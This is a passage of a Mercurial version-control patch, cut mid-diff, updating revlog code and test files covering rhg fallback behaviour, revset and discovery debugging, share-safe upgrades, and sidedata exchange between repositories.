deltabase = chunkdata[b'deltabase'] delta = chunkdata[b'delta'] flags = chunkdata[b'flags'] + sidedata = chunkdata[b'sidedata'] chain = node - yield (node, p1, p2, cs, deltabase, delta, flags) + yield (node, p1, p2, cs, deltabase, delta, flags, sidedata) def linkmap(lnode): return rlog.rev(lnode) @@ -293,7 +295,7 @@ # Verify text, rawtext, and rawsize if isext: - rawtext = writeprocessor(None, text, {})[0] + rawtext = writeprocessor(None, text)[0] else: rawtext = text if rlog.rawsize(rev) != len(rawtext): diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -22,8 +22,10 @@ $ cd empty-repo $ cat .hg/requires dotencode - exp-revlogv2.1 + exp-revlogv2.2 fncache + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) sparserevlog store diff --git a/tests/test-revlog.t b/tests/test-revlog.t --- a/tests/test-revlog.t +++ b/tests/test-revlog.t @@ -22,10 +22,10 @@ Unknown version is rejected >>> with open('.hg/store/00changelog.i', 'wb') as fh: - ... fh.write(b'\x00\x00\x00\x02') and None + ... fh.write(b'\x00\x00\xbe\xef') and None $ hg log - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (48879) in revlog 00changelog.i [50] $ cd .. diff --git a/tests/test-revset.t b/tests/test-revset.t --- a/tests/test-revset.t +++ b/tests/test-revset.t @@ -3108,3 +3108,18 @@ $ log 'expectsize(0:2, :2)' abort: revset size mismatch. expected between 0 and 2, got 3 [255] + +Test getting list of node from file + + $ hg log -r '0:2' -T '{node}\n' > some.nodes + $ hg log -r 'nodefromfile("some.nodes")' -T '{rev}\n' + 0 + 1 + 2 + $ hg log -r 'nodefromfile("missing-file")' -T '{rev}\n' + abort: cannot open nodes file "missing-file": $ENOENT$ + [255] + $ echo bad-node > bad.nodes + $ hg log -r 'nodefromfile("bad.nodes")' -T '{rev}\n' + $ echo abcdefabcdefabcdeabcdeabcdeabcdeabcdeabc > missing.nodes + diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -1,43 +1,50 @@ -#require rust +#require rhg -Define an rhg function that will only run if rhg exists - $ rhg() { - > if [ -f "$RUNTESTDIR/../rust/target/release/rhg" ]; then - > "$RUNTESTDIR/../rust/target/release/rhg" "$@" - > else - > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg." - > exit 80 - > fi - > } + $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort" Unimplemented command - $ rhg unimplemented-command - error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context + $ $NO_FALLBACK rhg unimplemented-command + unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context USAGE: - rhg <SUBCOMMAND> + rhg [OPTIONS] <SUBCOMMAND> For more information try --help + + [252] + $ rhg unimplemented-command --config rhg.on-unsupported=abort-silent [252] Finding root - $ rhg root + $ $NO_FALLBACK rhg root abort: no repository found in '$TESTTMP' (.hg not found)! [255] $ hg init repository $ cd repository - $ rhg root + $ $NO_FALLBACK rhg root $TESTTMP/repository +Reading and setting configuration + $ echo "[ui]" >> $HGRCPATH + $ echo "username = user1" >> $HGRCPATH + $ $NO_FALLBACK rhg config ui.username + user1 + $ echo "[ui]" >> .hg/hgrc + $ echo "username = user2" >> .hg/hgrc + $ $NO_FALLBACK rhg config ui.username + user2 + $ $NO_FALLBACK rhg --config ui.username=user3 config ui.username + user3 + Unwritable file descriptor - $ rhg root > /dev/full + $ $NO_FALLBACK rhg root > /dev/full abort: No space left on device (os error 28) [255] Deleted repository $ rm -rf `pwd` - $ rhg root + $ $NO_FALLBACK rhg root abort: error getting current working directory: $ENOENT$ [255] @@ -52,7 +59,7 @@ > hg commit -m "commit $i" -q Listing tracked files from root - $ rhg files + $ $NO_FALLBACK rhg files file1 file2 file3 @@ -60,13 +67,13 @@ Listing tracked files from subdirectory $ mkdir -p path/to/directory $ cd path/to/directory - $ rhg files + $ $NO_FALLBACK rhg files ../../../file1 ../../../file2 ../../../file3 Listing tracked files through broken pipe - $ rhg files | head -n 1 + $ $NO_FALLBACK rhg files | head -n 1 ../../../file1 Debuging data in inline index @@ -79,20 +86,20 @@ > hg add file-$i > hg commit -m "Commit $i" -q > done - $ rhg debugdata -c 2 + $ $NO_FALLBACK rhg debugdata -c 2 8d0267cb034247ebfa5ee58ce59e22e57a492297 test 0 0 file-3 Commit 3 (no-eol) - $ rhg debugdata -m 2 + $ $NO_FALLBACK rhg debugdata -m 2 file-1\x00b8e02f6433738021a065f94175c7cd23db5f05be (esc) file-2\x005d9299349fc01ddd25d0070d149b124d8f10411e (esc) file-3\x002661d26c649684b482d10f91960cc3db683c38b4 (esc) Debuging with full node id - $ rhg debugdata -c `hg log -r 0 -T '{node}'` + $ $NO_FALLBACK rhg debugdata -c `hg log -r 0 -T '{node}'` d1d1c679d3053e8926061b6f45ca52009f011e3f test 0 0 @@ -108,16 +115,16 @@ cf8b83f14ead62b374b6e91a0e9303b85dfd9ed7 91c6f6e73e39318534dc415ea4e8a09c99cd74d6 6ae9681c6d30389694d8701faf24b583cf3ccafe - $ rhg files -r cf8b83 + $ $NO_FALLBACK rhg files -r cf8b83 file-1 file-2 file-3 - $ rhg cat -r cf8b83 file-2 + $ $NO_FALLBACK rhg cat -r cf8b83 file-2 2 - $ rhg cat -r c file-2 - abort: ambiguous revision identifier c + $ $NO_FALLBACK rhg cat -r c file-2 + abort: ambiguous revision identifier: c [255] - $ rhg cat -r d file-2 + $ $NO_FALLBACK rhg cat -r d file-2 2 Cat files @@ -128,50 +135,77 @@ $ echo "original content" > original $ hg add original $ hg commit -m "add original" original - $ rhg cat -r 0 original + $ $NO_FALLBACK rhg cat -r 0 original original content Cat copied file should not display copy metadata $ hg copy original copy_of_original $ hg commit -m "add copy of original" - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original + original content + +Fallback to Python + $ $NO_FALLBACK rhg cat original + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + $ rhg cat original original content + $ FALLBACK_EXE="$RHG_FALLBACK_EXECUTABLE" + $ unset RHG_FALLBACK_EXECUTABLE + $ rhg cat original + abort: 'rhg.on-unsupported=fallback' without 'rhg.fallback-executable' set. + [255] + $ RHG_FALLBACK_EXECUTABLE="$FALLBACK_EXE" + $ export RHG_FALLBACK_EXECUTABLE + + $ rhg cat original --config rhg.fallback-executable=false + [1] + + $ rhg cat original --config rhg.fallback-executable=hg-non-existent + tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$ + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + + $ rhg cat original --config rhg.fallback-executable=rhg + Blocking recursive fallback. The 'rhg.fallback-executable = rhg' config points to `rhg` itself. + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + Requirements - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements dotencode fncache generaldelta + persistent-nodemap + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store $ echo indoor-pool >> .hg/requires - $ rhg files + $ $NO_FALLBACK rhg files + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg debugrequirements - dotencode - fncache - generaldelta - revlogv1 - sparserevlog - store - indoor-pool + $ $NO_FALLBACK rhg debugrequirements + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool + [252] $ echo -e '\xFF' >> .hg/requires - $ rhg debugrequirements - abort: .hg/requires is corrupted + $ $NO_FALLBACK rhg debugrequirements + abort: parse error in 'requires' file [255] Persistent nodemap $ cd $TESTTMP $ rm -rf repository - $ hg init repository + $ hg --config format.use-persistent-nodemap=no init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap [1] $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -179,14 +213,14 @@ $ ls .hg/store/00changelog* .hg/store/00changelog.d .hg/store/00changelog.i - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of $ cd $TESTTMP $ rm -rf repository $ hg --config format.use-persistent-nodemap=True init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap persistent-nodemap $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -198,7 +232,78 @@ .hg/store/00changelog.n Specifying revisions by changeset ID - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of - $ rhg cat -r c3ae8dec9fad of + $ $NO_FALLBACK rhg cat -r c3ae8dec9fad of r5000 + +Crate a shared repository + + $ echo "[extensions]" >> $HGRCPATH + $ echo "share = " >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo1 + $ echo a > repo1/a + $ hg -R repo1 commit -A -m'init' + adding a + + $ hg share repo1 repo2 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ $NO_FALLBACK rhg files -R repo2 + repo2/a + $ $NO_FALLBACK rhg -R repo2 cat -r 0 repo2/a + a + +Same with relative sharing + + $ hg share repo2 repo3 --relative + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ $NO_FALLBACK rhg files -R repo3 + repo3/a + $ $NO_FALLBACK rhg -R repo3 cat -r 0 repo3/a + a + +Same with share-safe + + $ echo "[format]" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo4 + $ cd repo4 + $ echo a > a + $ hg commit -A -m'init' + adding a + + $ cd .. + $ hg share repo4 repo5 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ cd repo5 + $ $NO_FALLBACK rhg files + a + $ $NO_FALLBACK rhg cat -r 0 a + a + +The blackbox extension is supported + + $ echo "[extensions]" >> $HGRCPATH + $ echo "blackbox =" >> $HGRCPATH + $ echo "[blackbox]" >> $HGRCPATH + $ echo "maxsize = 1" >> $HGRCPATH + $ $NO_FALLBACK rhg files > /dev/null + $ cat .hg/blackbox.log + ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob) + $ cat .hg/blackbox.log.1 + ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files (glob) + diff --git a/tests/test-rollback.t b/tests/test-rollback.t --- a/tests/test-rollback.t +++ b/tests/test-rollback.t @@ -103,7 +103,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt ; echo precious commit message @@ -118,7 +118,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt another precious commit message @@ -380,7 +380,7 @@ warn during abort rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -405,7 +405,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -431,7 +431,7 @@ transaction abort! warn during abort abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg verify checking changesets diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1328,25 +1328,25 @@ updating to branch b 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false + $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false --config devel.discovery.sample-size.initial=50 comparing with b query 1; heads searching for changes taking quick initial sample searching: 2 queries - query 2; still undecided: 1080, sample size is: 100 + query 2; still undecided: 1080, sample size is: 50 sampling from both directions searching: 3 queries - query 3; still undecided: 980, sample size is: 200 + query 3; still undecided: 1030, sample size is: 200 sampling from both directions searching: 4 queries - query 4; still undecided: 497, sample size is: 210 + query 4; still undecided: 547, sample size is: 210 sampling from both directions searching: 5 queries - query 5; still undecided: 285, sample size is: 220 + query 5; still undecided: 336, sample size is: 220 sampling from both directions searching: 6 queries - query 6; still undecided: 63, sample size is: 63 + query 6; still undecided: 114, sample size is: 114 6 total queries in *.????s (glob) elapsed time: * seconds (glob) round-trips: 6 @@ -1412,22 +1412,30 @@ missing: 1040 common heads: 3ee37d65064a - $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.01 + $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.20 --config devel.discovery.sample-size=50 comparing with b searching for changes sampling from both directions - query 1; still undecided: 1340, sample size is: 200 + query 1; still undecided: 1340, sample size is: 50 + sampling from both directions + query 2; still undecided: 995, sample size is: 60 sampling from both directions - query 2; still undecided: 795, sample size is: 202 + query 3; still undecided: 913, sample size is: 72 sampling from both directions - query 3; still undecided: 525, sample size is: 204 + query 4; still undecided: 816, sample size is: 204 + sampling from both directions + query 5; still undecided: 612, sample size is: 153 sampling from both directions - query 4; still undecided: 252, sample size is: 206 + query 6; still undecided: 456, sample size is: 123 + sampling from both directions + query 7; still undecided: 332, sample size is: 147 sampling from both directions - query 5; still undecided: 44, sample size is: 44 - 5 total queries in *s (glob) - elapsed time: * seconds (glob) - round-trips: 5 + query 8; still undecided: 184, sample size is: 176 + sampling from both directions + query 9; still undecided: 8, sample size is: 8 + 9 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 9 heads summary: total common heads: 1 also local heads: 0 @@ -1580,3 +1588,175 @@ common: 0 missing: 1 common heads: 66f7d451a68b + + $ cd .. + + +Test debuging discovery using different subset of the same repository +===================================================================== + +remote is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + all remote heads known locally + elapsed time: * seconds (glob) + round-trips: 1 + heads summary: + total common heads: 25 + also local heads: 25 + also remote heads: 25 + both: 25 + local heads: 260 + common: 25 + missing: 235 + remote heads: 25 + common: 25 + unknown: 0 + local changesets: 1340 + common: 400 + heads: 25 + roots: 1 + missing: 940 + heads: 235 + roots: 235 + first undecided set: 940 + heads: 235 + roots: 235 + common: 0 + missing: 940 + common heads: 0dfd965d91c6 0fe09b60448d 14a17233ce9d 175c0a3072cf 1c51e2c80832 1e51600e0698 24eb5f9bdbab 25ce09526613 36bd00abde57 426989fdefa0 596d87362679 5dd1039ea5c0 5ef24f022278 5f230dc19419 80b39998accb 88f40688ffb5 9e37ddf8c632 abf4d55b075e b2ce801fddfe b368b6ac3ce3 c959bf2e869c c9fba6ba4e2e d783207cf649 d9a51e256f21 e3717a4e3753 + +local is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery b \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + comparing with b + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 1 + common: 0 + unknown: 1 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a + +both local and remove are subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 25 + common: 0 + unknown: 25 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a + +Test -T json output +------------------- + + $ hg -R a debugdiscovery \ + > -T json \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + [ + { + "elapsed": *, (glob) + "nb-common-heads": 1, + "nb-common-heads-both": 0, + "nb-common-heads-local": 0, + "nb-common-heads-remote": 0, + "nb-common-roots": 1, + "nb-head-local": 25, + "nb-head-local-missing": 25, + "nb-head-remote": 25, + "nb-head-remote-unknown": 25, + "nb-ini_und": 400, + "nb-ini_und-common": 300, + "nb-ini_und-heads": 25, + "nb-ini_und-missing": 100, + "nb-ini_und-roots": 1, + "nb-missing-heads": 25, + "nb-missing-roots": 25, + "nb-revs": 400, + "nb-revs-common": 300, + "nb-revs-missing": 100, + "output": "query 1; heads\nsearching for changes\ntaking quick initial sample\nquery 2; still undecided: 375, sample size is: 81\nsampling from both directions\nquery 3; still undecided: 3, sample size is: 3\n3 total queries in *s\n", (glob) + "total-roundtrips": 3 + } + ] diff --git a/tests/test-share-bookmarks.t b/tests/test-share-bookmarks.t --- a/tests/test-share-bookmarks.t +++ b/tests/test-share-bookmarks.t @@ -102,7 +102,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm1 FYI, in contrast to above test, bmX is invisible in repo1 (= shared @@ -127,7 +127,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm3 clean up bm2 since it's uninteresting (not shared in the vfs case and @@ -249,7 +249,7 @@ no changes found adding remote bookmark bm3 abort: forced failure by extension - [255] + [40] $ hg boo bm1 3:b87954705719 bm4 5:92793bfc8cad diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -7,6 +7,11 @@ > use-share-safe = True > [storage] > revlog.persistent-nodemap.slow-path=allow + > # enforce zlib to ensure we can upgrade to zstd later + > [format] + > revlog-compression=zlib + > # we want to be able to enable it later + > use-persistent-nodemap=no > EOF prepare source repo @@ -352,18 +357,27 @@ - changelog - manifest - $ hg debugupgraderepo --run -q + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store added: share-safe + share-safe + Upgrades a repository to share-safe format so that future shares of this repository share its requirements and configs. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + upgrading repository requirements + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode. $ hg debugrequirements @@ -433,7 +447,7 @@ - changelog - manifest - $ hg debugupgraderepo -q --run + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements @@ -445,6 +459,12 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + upgrading repository requirements + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared. $ hg debugrequirements diff --git a/tests/test-sidedata-exchange.t b/tests/test-sidedata-exchange.t new file mode 100644 --- /dev/null +++ b/tests/test-sidedata-exchange.t @@ -0,0 +1,473 @@ +=========================== +Tests for sidedata exchange +=========================== + +Check simple exchange behavior +============================== + +Pusher and pushed have sidedata enabled +--------------------------------------- + + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . ../sidedata-target + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata a 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. + +Puller and pulled have sidedata enabled +--------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata a 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. + +Now on to asymmetric configs. + +Pusher has sidedata enabled, pushed does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . ../sidedata-target --traceback + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. + +Pulled has sidedata enabled, puller does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. + + +Check sidedata exchange with on-the-fly generation and removal +============================================================== + +(Push) Target has strict superset of the source +----------------------------------------------- + + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + +We expect the client to abort the push since it's not capable of generating +what the server is asking + $ hg push -r . ../target-repo + pushing to ../target-repo + abort: cannot push: required sidedata category not supported by this client: '1' + [255] + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that was generated by the source on push + $ hg push -r . ../target-repo + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ cd .. + +(Push) Difference is not subset/superset +---------------------------------------- + +Source has one in common, one missing and one more sidedata category with the +target. + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ cat << EOF >> source-repo/.hg/hgrc + > [extensions] + > testsidedata3=$TESTDIR/testlib/ext-sidedata-3.py + > EOF + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > 